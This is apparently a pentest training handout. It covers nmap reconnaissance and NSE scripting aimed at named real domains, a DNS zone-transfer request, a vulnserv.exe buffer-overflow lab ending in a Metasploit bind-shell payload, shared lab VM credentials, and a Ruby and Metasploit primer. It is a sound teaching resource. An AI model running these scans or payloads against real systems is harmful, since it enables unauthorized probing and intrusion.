1##############################
2# Basic Scanning Methodology #
3# Transition from Blue to #
4# Red Team Tactics #
5##############################
6
7- Ping Sweep
8What's alive?
9---------------------------Type This-----------------------------------
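# Host discovery (ping sweep). -sn is the current spelling of -sP (the old
# flag still works as an alias). Quote the target so the shell cannot
# glob-expand the "*" against files in the current directory. Root is needed
# for the raw ICMP/ARP probes; enter the sudo password at the prompt instead
# of keeping it in the transcript. Scan only hosts you are authorized to test.
sudo nmap -sn '157.166.226.*'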
12-------------------------------------------------------------------------
13
14
15 - If -sP reports nothing, try a list scan. Note that -sL sends no packets to the targets (it only resolves their names), so it shows what exists in DNS rather than what is alive:
16---------------------------Type This-----------------------------------
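# List scan: enumerates the targets and reverse-resolves each one without
# sending a packet to the hosts themselves, so it needs no root -- sudo (and
# the password line that followed it) dropped.
nmap -sL '157.166.226.*'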
19-------------------------------------------------------------------------
20
21
22 -Look for hostnames:
23---------------------------Type This-----------------------------------
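# Reverse-resolve every address in the range and keep only the lines whose
# name contains "com". -sL is unprivileged, so no sudo is required.
nmap -sL '157.166.226.*' | grep com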
26-------------------------------------------------------------------------
27
28
29- Port Scan
30What's where?
31---------------------------Type This-----------------------------------
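# SYN scan of nmap's default port list. Raw sockets need root; type the sudo
# password at the prompt rather than leaving it in a runnable transcript.
# Scan only hosts you are authorized to test.
sudo nmap -sS 162.243.126.247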
34-------------------------------------------------------------------------
35
36
37
38- Bannergrab/Version Query
39What versions of software are running
40---------------------------Type This-----------------------------------
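# Version detection: nmap talks to each open port and matches the banner
# against its probe database. sudo is kept so the underlying port scan is a
# SYN scan as before; enter the password at the prompt, not in the file.
sudo nmap -sV 162.243.126.247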
43-------------------------------------------------------------------------
44
45
46
47- Vulnerability Research
48Look up the banner versions for public exploits. Treat anything you download as untrusted code: read it before you compile or run it, and cross-check the affected versions against the vendor advisory.
49----------------------------------------------
50http://exploit-db.com
51http://securityfocus.com/bid
52https://packetstormsecurity.com/files/tags/exploit/
53
54
55-------------------------------------------------------------------------
56
57
58---------------------------Type This-----------------------------------
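cd ~/toolz

# Fetch the scanner source. Keep TLS verification on: --no-check-certificate
# lets anyone on the path hand you different C code that you are about to
# compile and run. If the download fails on a certificate error, fix the CA
# bundle instead of disabling the check.
wget https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c

# Read the source before building it -- it is unsigned code from a third party.
gcc ipcrawl.c -o ipcrawl

# 755 is all a binary needs to run; 777 makes it writable by every local user.
chmod 755 ipcrawl

# DNS lookup of every IP in the range (IP -> hostname)
./ipcrawl 148.87.1.1 148.87.1.254

# List scan: reverse-DNS only, no packets to the hosts, so root is not needed.
nmap -sL 148.87.1.0-255
nmap -sL 148.87.1.0-255 | grep oracle

wget https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c

gcc propecia.c -o propecia

# Run the tool from ~/toolz instead of copying an unreviewed binary into /bin
# as root; nothing here depends on it being on the system PATH.
./propecia 162.243.126 22
./propecia 162.243.126 80
./propecia 162.243.126 443
./propecia 162.243.126 3389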
91-------------------------------------------------------------------------
92
93
94
95
96
97
98
99###########################
100# Target IP Determination #
101###########################
102---------------------------Type This-----------------------------------
# blindcrawl.pl presumably enumerates hostnames under the given domain
# (-d); chain with && so it only runs if the directory change succeeded.
# Use it only against domains you are authorized to test.
cd /home/strategicsec/toolz && perl blindcrawl.pl -d motorola.com
106----------------------------------------------------------------------
107
108-- Take each IP address and look it up here:
109http://www.networksolutions.com/whois/index.jsp
110
111
112Zone transfers (AXFR) are refused by most correctly configured name servers, but here is an example of one that answered at the time of writing. Request transfers only for domains you are authorized to test:
113---------------------------Type This-----------------------------------
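# Ask the authoritative server for the whole zone; this only succeeds when
# the server is misconfigured to allow AXFR from anyone.
dig axfr heartinternet.co.uk @ns.heartinternet.co.uk

cd ~/toolz/
# DNS lookup of every IP in the range (IP -> hostname)
./ipcrawl 148.87.1.1 148.87.1.254

# List scan: reverse-DNS only, no packets to the hosts, so root is not
# needed (the original sudo + pasted password removed).
nmap -sL 148.87.1.0-255
nmap -sL 148.87.1.0-255 | grep oracle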
127----------------------------------------------------------------------
128
129
130
131
132###########################
133# Load Balancer Detection #
134###########################
135
136Here are some options to use for identifying load balancers:
137 - http://toolbar.netcraft.com/site_report
138 - https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
139
140
141Here are some command-line options to use for identifying load balancers:
142---------------------------Type This-----------------------------------
# Several A records for one name is a first hint of load balancing.
dig microsoft.com

# lbd and halberd actively probe the target with repeated requests and
# compare the answers -- run them only against hosts you are authorized to test.
cd ~/toolz && ./lbd-0.1.sh microsoft.com

for domain in microsoft.com motorola.com oracle.com; do
  halberd "$domain"
done
152----------------------------------------------------------------------
153
154
155######################################
156# Web Application Firewall Detection #
157######################################
158---------------------------Type This-----------------------------------
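cd ~/toolz/wafw00f
# wafw00f fingerprints a WAF from how the site answers its probe requests.
python wafw00f.py http://www.oracle.com
python wafw00f.py http://www.strategicsec.com

cd ~/toolz/
# Same idea with nmap's NSE script. Enter the sudo password at the prompt
# rather than pasting it into the transcript. healthcare.gov is a live
# government site: probe only targets you are authorized to test.
sudo nmap -p 80 --script http-waf-detect.nse oracle.com
sudo nmap -p 80 --script http-waf-detect.nse healthcare.gov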
170----------------------------------------------------------------------
171
172#####################################
173# Writing Your Own Nmap NSE Scripts #
174#####################################
175---------------------------Type This-----------------------------------
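# Start from a clean file. -f is enough: -r adds nothing for a single file
# and makes a mistyped path far more dangerous when run under sudo.
sudo rm -f /usr/share/nmap/scripts/intro-nse.nse

# The script lives in the root-owned system nmap scripts directory.
sudo vi /usr/share/nmap/scripts/intro-nse.nse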
179-----------------------------------------------------------------------
180
181---------------------------Paste This----------------------------------
-- The Head Section --
-- (empty: this first version needs no libraries)

-- The Rule Section --
-- Decide per port whether the action runs: only an open TCP port 80.
portrule = function(host, port)
  local is_tcp = (port.protocol == "tcp")
  local is_http_port = (port.number == 80)
  local is_open = (port.state == "open")
  return is_tcp and is_http_port and is_open
end

-- The Action Section --
-- Fixed output so we can see the rule firing in nmap's report.
action = function(host, port)
  local banner = "RedTeam!"
  return banner
end
194----------------------------------------------------------------------
195
196- Ok, now that we've made that change let's run the script
197---------------------------Type This-----------------------------------
# Run only our script, by path, against three ports; the rule decides which
# of them get the action. Scan only hosts you are authorized to test.
sudo nmap -p 22,80,443 --script "/usr/share/nmap/scripts/intro-nse.nse" infosecaddicts.com
199----------------------------------------------------------------------
200
201
202
203
204
205----------------------------------------------------------------------
# Reopen the root-owned script for the next revision.
sudo vi "/usr/share/nmap/scripts/intro-nse.nse"
207----------------------------------------------------------------------
208
209---------------------------Paste This----------------------------------
-- The Head Section --
-- shortport bundles the common port rules so we do not hand-roll the
-- protocol/number/state test ourselves.
local shortport = require "shortport"

-- The Rule Section --
-- shortport.http matches ports nmap believes speak HTTP (e.g. 80, 443, 8080,
-- or any port whose detected service is http/https), not just port 80.
portrule = shortport.http

-- The Action Section --
-- Fixed output so we can see the rule firing in nmap's report.
action = function(host, port)
  local banner = "RedTeam!"
  return banner
end
221----------------------------------------------------------------------
222
223- Ok, now that we've made that change let's run the script
224---------------------------Type This-----------------------------------
# Same run as before; with shortport.http the action now fires on 443 too.
sudo nmap -p 22,80,443 --script "/usr/share/nmap/scripts/intro-nse.nse" infosecaddicts.com
226----------------------------------------------------------------------
227
228
229
230
231
232
233OK, now let's have some fun with my buddy Carlos Perez's website (darkoperator.com), which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year. The scripts below send real HTTP requests to that site, so stick to targets you have permission to probe.
234
235
236---------------------------Type This-----------------------------------
# Reopen the root-owned script for the next revision.
sudo vi "/usr/share/nmap/scripts/intro-nse.nse"
238----------------------------------------------------------------------
239
240
241---------------------------Paste This----------------------------------
-- The Head Section --
-- shortport supplies the standard "is this an HTTP port" rule; http does the request.
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
-- Request one hard-coded path and report the HTTP status code that came back
-- (nil, i.e. no output, if the request produced no response).
-- NOTE(review): this hits a third party's web server -- authorized targets only.
action = function(host, port)
  local target_path = "/installing-metasploit-in-ubunt/"
  local reply = http.get(host, port, target_path)
  return reply.status
end
257----------------------------------------------------------------------
258
259- Ok, now that we've made that change let's run the script
260---------------------------Type This-----------------------------------
# Run the script against darkoperator.com (a third party's site -- with permission only).
sudo nmap -p 22,80,443 --script "/usr/share/nmap/scripts/intro-nse.nse" darkoperator.com
262----------------------------------------------------------------------
263
264
265
266----------------------------------------------------------------------
# Reopen the root-owned script for the next revision.
sudo vi "/usr/share/nmap/scripts/intro-nse.nse"
268----------------------------------------------------------------------
269
270---------------------------Paste This----------------------------------
-- The Head Section --
local shortport = require "shortport"
local http = require "http"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
-- Fetch one hard-coded path and hand nmap the whole response body, but only
-- on a 200; any other status yields nil, so nmap prints nothing for the port.
action = function(host, port)
  local target_path = "/installing-metasploit-in-ubunt/"
  local reply = http.get(host, port, target_path)
  if reply.status ~= 200 then
    return nil
  end
  return reply.body
end
289----------------------------------------------------------------------
290
291- Ok, now that we've made that change let's run the script
292---------------------------Type This-----------------------------------
# Run the script against darkoperator.com (a third party's site -- with permission only).
sudo nmap -p 22,80,443 --script "/usr/share/nmap/scripts/intro-nse.nse" darkoperator.com
294----------------------------------------------------------------------
295
296
297
298
299
300
301
302---------------------------Type This-----------------------------------
# Reopen the root-owned script for the next revision.
sudo vi "/usr/share/nmap/scripts/intro-nse.nse"
304----------------------------------------------------------------------
305
306
307---------------------------Paste This----------------------------------
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
-- Fetch one hard-coded path; on a 200, search the body for the expected page
-- title and return it (nil if absent). Non-200 responses produce no output.
action = function(host, port)
  local target_path = "/installing-metasploit-in-ubunt/"
  local reply = http.get(host, port, target_path)
  if reply.status ~= 200 then
    return nil
  end
  -- The pattern is a plain literal (no magic characters), so this is a substring test.
  local title = string.match(reply.body, "Installing Metasploit in Ubuntu and Debian")
  return title
end
328----------------------------------------------------------------------
329
330- Ok, now that we've made that change let's run the script
331---------------------------Type This-----------------------------------
# Run the script against darkoperator.com (a third party's site -- with permission only).
sudo nmap -p 22,80,443 --script "/usr/share/nmap/scripts/intro-nse.nse" darkoperator.com
333----------------------------------------------------------------------
334
335
336
337
338
339
340
341---------------------------Type This-----------------------------------
# Reopen the root-owned script for the next revision.
sudo vi "/usr/share/nmap/scripts/intro-nse.nse"
343----------------------------------------------------------------------
344
345---------------------------Paste This----------------------------------
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"

-- The Rule Section --
portrule = shortport.http

-- The Action Section --
-- Fetch one hard-coded path and, on a 200, report whether the expected page
-- title appears in the body. Non-200 responses produce no output.
-- The two labels are placeholders for the pattern: matching a page title
-- proves only that the page is there, not that anything is exploitable. A
-- real check would extract a version string and compare it to a known-bad range.
action = function(host, port)
  local target_path = "/installing-metasploit-in-ubunt/"
  local reply = http.get(host, port, target_path)
  if reply.status ~= 200 then
    return nil
  end
  local found = string.match(reply.body, "Installing Metasploit in Ubuntu and Debian")
  if found then
    return "Vulnerable"
  end
  return "Not Vulnerable"
end
370
371----------------------------------------------------------------------
372
373- Ok, now that we've made that change let's run the script
374---------------------------Type This-----------------------------------
# Run the script against darkoperator.com (a third party's site -- with permission only).
sudo nmap -p 22,80,443 --script "/usr/share/nmap/scripts/intro-nse.nse" darkoperator.com
376----------------------------------------------------------------------
377
378
379
380#####################################
381# Quick Stack Based Buffer Overflow #
382#####################################
383
384- You can download everything you need for this exercise (except netcat) from the link below
385https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
386
387- Extract this zip file to your Desktop
388
389- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe (it listens on TCP 9999 and is intentionally vulnerable, so keep this VM on an isolated / host-only network)
390
391- Open a new command prompt and type:
392nc localhost 9999
393
394- In the new command prompt window where you ran nc type:
395HELP
396
397- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
398- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
399
400- Now double-click on 1-simplefuzzer.py
401- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
402
403
404- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
405
406- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
407
408- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
409
410- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
411
412- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
413
414- Calculate the distance to EIP by running script 3-3000chars.py
415- This script sends 3000 nonrepeating chars to vulnserv.exe and populates EIP with the value: 396F4338
416
4174-count-chars-to-EIP.py
418- In the previous script EIP reads 396F4338. x86 is little-endian, so the four bytes that landed in EIP were sent in the order 38 43 6F 39, i.e. the ASCII characters 8 (38), C (43), o (6F), 9 (39)
419- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
420
4215-2006char-eip-check.py
422- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
423
4246-jmp-esp.py
425- In this script we overwrite EIP with the address of a JMP ESP instruction (6250AF11) inside essfunc.dll. This only works if that address is the same every time the process starts, so verify it in OllyDBG after restarting vulnserv before relying on it.
426
4277-first-exploit
428- In this script we actually do the stack overflow and launch a bind shell on port 4444. A bind shell leaves port 4444 listening on the victim for anyone who can reach it, so only do this on an isolated lab network.
429
4308 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
431
432
433------------------------------
434
# Drop the custom module into the framework's module tree so msfconsole
# loads it on start. (~/.msf4/modules/exploits/windows/misc/ keeps custom
# modules out of the checked-out framework directory, if you prefer.)
cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
vi vulnserv.rb   # paste the code into this file

cd ~/toolz/metasploit
./msfconsole

# Inside msfconsole. bind_tcp opens a listener on the victim (RHOST), so run
# this only on an isolated lab network.
use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.88.129
set RPORT 9999
exploit
451exploit
452
453
454
455
456
457
458
459Code to analyze:
460https://downloads.securityfocus.com/vulnerabilities/exploits/07.30.dcom48.c
461
462
463
464
465
466
467Metasploit Next Level
468
469
470##########################
471# Download the attack VM #
472##########################
473https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
474user: infosecaddicts
475pass: infosecaddicts
(lab default credentials shared with everyone who has this page: keep the VM on a host-only network)
476
477
478
479
480
481###########################
482# Download the victim VMs #
483###########################
484https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
485user: workshop
486pass: password
487
488
489###########################
490# Exploit Development VMs #
491###########################
492Note: this link was not yet live when these notes were written.
493https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip
494
495user: administrator
496pass: strategicsec
497
498
499https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
500user: strategicsec
501pass: strategicsec
502
503
504
505
506
507############################################################
508# Section 1: Ruby Fundamentals and Metasploit Architecture #
509############################################################
510
511############################
512# Day 1: Ruby Fundamentals #
513############################
514
515
516
517- Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
518scientist and programmer from Japan. It is a cross-platform dynamic language.
519
520- The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
521on Rails is a framework that is written in Ruby.
522
523- Ruby's file name extensions are .rb and .rbw.
524
525- The official website of the language is www.ruby-lang.org.
528
529
530- Ruby ships with an interactive shell, IRB (Interactive Ruby), which we use below.
531
532
533- Installing and Running IRB
534
535---------------------------Type This-----------------------------------
# Print the installed Ruby version (--version is the long form of -v).
ruby --version
537-----------------------------------------------------------------------
538
539
540If you don't have ruby2.3 use the commands below:
541-----------------------------------------------------------------------
# Interpreter, headers for native gems, docs, and the irb/rdoc/ri tools.
sudo apt-get install irb rdoc ri ruby2.3 ruby2.3-dev ruby2.3-doc
543-----------------------------------------------------------------------
544
545- open up the interactive console and play around.
546
547---------------------------Type This-----------------------------------
# Start the interactive Ruby shell; every "Type This" Ruby snippet below is entered here.
irb
549-----------------------------------------------------------------------
550
551
552- Math, Variables, Classes, Creating Objects and Inheritance
553
554
555The following arithmetic operators:
556 Addition operator (+) — 10 + 23
557 Subtraction operator (-) — 1001 - 34
558 Multiplication operator (*) — 5 * 5
559 Division operator (/) — 12 / 2
560
561
562
563- Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
564operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then `x + 30` evaluates to 55
565but leaves x unchanged (irb only displays the result; to change x you would write x += 30). Likewise 69 is assigned to y, and `y + 33` evaluates to 102.
566
567---------------------------Type This-----------------------------------
# Assignment binds a name to a value; the bare arithmetic lines only produce
# a result for irb to display and leave x and y unchanged.
x = 25
30 + x
y = 69
33 + y
572-----------------------------------------------------------------------
573
574
575
576- Let's look at creating classes and creating objects.
577
578- Here, the name of the class is Attack. An object has its properties and methods; attr_accessor creates a reader and a writer for each of the three properties.
579
580
581---------------------------Type This-----------------------------------
# Attack: a plain data holder with three read/write attributes
# (the separate reader/writer declarations are what attr_accessor expands to).
class Attack
  attr_reader :of, :sqli, :xss
  attr_writer :of, :sqli, :xss
end
585-----------------------------------------------------------------------
586
587
588What is nil?
589Reference:
590https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638
591
592nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:
593
594Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.
595
596To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:
597
598
599
600
601
602# Now that we have created the classes let's create the objects
603---------------------------Type This-----------------------------------
604first_attack = Attack.new
605first_attack.of = "stack"
606first_attack.sqli = "blind"
607first_attack.xss = "dom"
608puts first_attack.of
609puts first_attack.sqli
610puts first_attack.xss
611-----------------------------------------------------------------------
612
613
614
615
616- Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
617inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
618one object can access the properties/attributes of another object of a different class. Inheritance makes your
619programming life easier by maximizing code reuse.
620
621
622---------------------------Type This-----------------------------------
623class Exploitframeworks
624attr_accessor :scanners, :exploits, :shellcode, :postmodules
625end
626class Metasploit < Exploitframeworks
627end
628class Canvas < Exploitframeworks
629end
630class Coreimpact < Exploitframeworks
631end
632class Saint < Exploitframeworks
633end
634class Exploitpack < Exploitframeworks
635end
636-----------------------------------------------------------------------
637
638
639
640
641- Methods, More Objects, Arguments, String Functions and Expression Shortcuts
642
643- Let's create a simple method. A method is used to perform an action and is generally called with an object.
644
645- Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
646it will print this string: "We are Learning how to PenTest"
647
648- An object named 'joe' is created, which is used to call the method.
649
650
651---------------------------Type This-----------------------------------
652class Msfnl
653def learning
654puts "We are Learning how to PenTest"
655end
656end
657-----------------------------------------------------------------------
658
659#Now let's define an object for our Method
660
661---------------------------Type This-----------------------------------
662joe = Msfnl.new
663joe.learning
664-----------------------------------------------------------------------
665
666
667
668- An argument is a value or variable that is passed to the function while calling it. In the following example, while
669calling the puts() function, we are sending a string value to the function. This string value is used by the
670function to perform some particular operations.
671
672puts ("Pentesting")
673
674
675- There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
676explain some useful string functions with an example.
677
678- The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
679reverse function reverses a string. The following example demonstrates how to use the string functions.
680
681---------------------------Type This-----------------------------------
68255.class
683"I Love Programming".class
684"I Love Pentesting".length
685"Pown that box".upcase
686"Love" + "To Root Boxes"
687"evil".reverse
688"evil".reverse.upcase
689-----------------------------------------------------------------------
690
691
692- expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand, '=' is
693an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the
694examples of some expressions.
695
696---------------------------Type This-----------------------------------
697a = 3
698b = 6
699a+b+20
700d = 44
701f = d
702puts f
703-----------------------------------------------------------------------
704
705
706
707
708
709- shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
710assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
711statements to understand the shortcuts.
712
713---------------------------Type This-----------------------------------
714g = 70
715g = g+44
716g += 33
717-----------------------------------------------------------------------
718
719
720- In the above statement, g is incremented by 33 and then the total value is assigned to g.
721
722
723
724---------------------------Type This-----------------------------------
725g *= 3
726-----------------------------------------------------------------------
727
728
729- In the above statement, g is multiplied with 3 and then assigned to g.
730
731- Example
732
733- Comparison Operators, Loops, Data Types, and Constants
734
735- Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
736how to use the following comparison operators.
737
738'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
739variable or constant. If it's less than the other, the 'less than' operator returns true.
740
741'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
742or constant. If it's equal to the other, the 'equal to' operator returns true.
743
744'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
745variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.
746
747---------------------------Type This-----------------------------------
748numberofports = 55
749puts "number of ports found during scan" if numberofports < 300
750numberofports = 400
751puts "number of ports found during scan" if numberofports < 300
752puts "number of ports found during scan" if numberofports == 300
753puts "number of ports found during scan" if numberofports != 300
754-----------------------------------------------------------------------
755
756
757
758Example
759
760
761- the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator.
762
763- This operator is generally used to combine multiple conditions.
764- In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the
765
766- following example to understand how this operator works.
767
768---------------------------Type This-----------------------------------
769ports = 100
770puts "number of ports found on the network" if ports<100 || ports>200
771puts "number of ports found on the network" if ports<100 || ports>75
772-----------------------------------------------------------------------
773
774# unless
775
776---------------------------Type This-----------------------------------
777portsbelow1024 = 50
778puts "If the ports are below 1024" unless portsbelow1024 < 1000
779puts "If the ports are below 1024" unless portsbelow1024 < 1055
780puts "If the ports are below 1024" unless portsbelow1024 < 20
781-----------------------------------------------------------------------
782
783- The 'unless' keyword is used to do something programmatically unless a condition is true.
784
785
786
787- Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
788
789- See the following example to understand how a string is printed 10 times on the screen using a loop.
790
791---------------------------Type This-----------------------------------
79210.times do puts "infosecaddicts" end
793-----------------------------------------------------------------------
794
795# Or use the curly braces
796
797---------------------------Type This-----------------------------------
79810.times {puts "infosecaddicts"}
799-----------------------------------------------------------------------
800
801
802- Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
803working with different data types. Data type conversion is also known as type casting.
804
805
806
807- Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
808change the value of a constant, you will see a warning message.
809
810
811
812
813- Multiple Line String Variable, Interpolation, and Regular Expressions
814
815- A multiple line string variable lets you assign the value to the string variable through multiple lines.
816
817---------------------------Type This-----------------------------------
818infosecaddicts = <<mark
819welcome
820to the
821best
822metasploit
823course
824on the
825market
826mark
827puts infosecaddicts
828-----------------------------------------------------------------------
829
830
831- Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
832it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
833Examine the following example to understand how interpolation works in Ruby.
834
835References:
836https://stackoverflow.com/questions/10869264/meaning-of-in-ruby
837
838
839---------------------------Type This-----------------------------------
840a = 4
841b = 6
842puts "a * b = a*b"
843puts " #{a} * #{b} = #{a*b} "
844person = "Joe McCray"
845puts "IT Security consultant person"
846puts "IT Security consultant #{person}"
847-----------------------------------------------------------------------
848
849- Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
850
851
852
853
854
855- Character classes
856---------------------------Type This-----------------------------------
857infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
858"I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
859"I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
860-----------------------------------------------------------------------
861
862
863- Arrays, Push and Pop, and Hashes
864
865
866- In the following example, numbers is an array that holds 6 integer numbers.
867
868
869---------------------------Type This-----------------------------------
870numbers = [2,4,6,8,10,100]
871puts numbers[0]
872puts numbers[4]
873numbers[2] = 150
874puts numbers
875-----------------------------------------------------------------------
876
877
878
879- Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push (<< or push adds to the end) and pop (removes from the end). The final shift call is not a stack operation: it removes the first element, which is queue behaviour.
880
881
882---------------------------Type This-----------------------------------
883framework = []
884framework << "modules"
885framework << "exploits"
886framework << "payloads"
887framework.pop
888framework.shift
889-----------------------------------------------------------------------
890
891- Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
892that is used to access the element.
893
894
895- Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
896In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
897respective values: 'what module should you use', 'Windows XP' and 'SSH'.
898
899---------------------------Type This-----------------------------------
900metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
901print metasploit.size
902print metasploit["microsoft"]
903metasploit['microsoft'] = 'redhat'
904print metasploit['microsoft']
905-----------------------------------------------------------------------
906
907
908
909- Writing Ruby Scripts
910
911
912- Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what
913this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
914someone made to look for a specific port. The port that it is looking for is port 21 FTP.
915---------------------------Type This-----------------------------------
# Enter the port-scanner module directory and list the modules in it.
cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan && ls
918-----------------------------------------------------------------------
919
920ack.rb ftpbounce.rb syn.rb tcp.rb xmas.rb
921
922- Lets look at tcp.rb
923
924
925
926- Let's take the time now to create and design our own port scanner. What we will design here is a connect scanner that
927tries ports 1 through 1024 on one host and prints "Port Open" for each one that accepts a connection. Because it completes a
928TCP handshake on every port, it is far noisier than a SYN scan and shows up clearly in the target's logs. This is a pretty
929basic script, but it will help you in the event that you need to write something on the fly.
930
931
932-----------------------------------------------------------------------
933- PortScanner.rb :
934
935require 'socket'
936require 'timeout'
937
938puts "Enter IP Address to Scan:"
939ipaddress = gets
940
9411.upto(1024) {|port|
942 begin
943 timeout(5) do
944 TCPSocket.open(ipaddress.chop, port)
945 end
946 puts "Response/Port Open: #{port}"
947 rescue Timeout::Error
948 # uncomment the following line to show closed ports (noisy!)
949 #puts "No Response /Port closed: #{port}"
950 rescue
951 # uncomment the following line to show closed ports (noisy!)
952 #puts "No Response /Port closed: #{port}"
953 end
954}
955
956---------------------------------------------------------------------------------
957
958Day 1 Homework:
959Send Ivana an email ivana{a-t}strategicsec{d-o-t}.com with a word document that contains screenshots of everything that we have covered so far. Make the subject of the email "First Name - Last Name - Metasploit Day 1" (ex: Joseph - McCray - Metasploit Day 1).
960
961Also be sure to name the attached file "FirstName.LastName.MetasploitDay1.docx" (Joseph.McCray.MetasploitDay1.docx).
962
963NOTE: This is what is required in order to receive your certificate of completion and CPEs.
964---------------------------------------------------------------------------------
965
966
967
968##################################
969# Day 2: Metasploit Fundamentals #
970##################################
971
972- Let's take a little look at Metasploit Framework
973
974- First, we should take note of the different directories, the Modular Architecture.
975
976The modules that make up the Modular Architecture are
977Exploits
978Auxiliary
979Payload
980Encoder
981Nops
982
983
984Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
985
986are
987
988Modules
989Scripts
990Plugins
991External
992Data
993Tools
994
995- Let's take a look inside the Metasploit directory and see what's there.
996---------------------------Type This-----------------------------------
997cd ~/toolz/metasploit
998ls
999-----------------------------------------------------------------------
1000
1001
1002
1003- Now let's take a look inside the Modules directory and see what's there.
1004---------------------------Type This-----------------------------------
1005cd ~/toolz/metasploit/modules
1006ls
1007-----------------------------------------------------------------------
1008
1009
1010The auxiliary directory is where things like our port-scanners will be, or any module that we can run that does
1011not necessarily need to have a shell or session started on a machine.
1012
1013The exploits directory has our modules that we need to pop a shell on a box.
1014The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
1015like Burp Suite
1016- Let's take a look at the external directory
1017---------------------------Type This-----------------------------------
1018cd ~/toolz/metasploit/external
1019ls
1020-----------------------------------------------------------------------
1021
1022- Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
1023---------------------------Type This-----------------------------------
1024cd ~/toolz/metasploit/data
1025ls
1026-----------------------------------------------------------------------
1027
1028- For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
1029brute-forcing
1030---------------------------Type This-----------------------------------
1031cd ~/toolz/metasploit/data/wordlists
1032ls
1033-----------------------------------------------------------------------
1034
1035- The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
1036once a session is created.
1037---------------------------Type This-----------------------------------
1038cd ~/toolz/metasploit/data/meterpreter
1039ls
1040-----------------------------------------------------------------------
1041
1042- The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
1043like escalating privileges and dumping hashes.
1044
1045These are being phased out, though, and post-exploitation modules are now preferred.
1046The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
1047find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
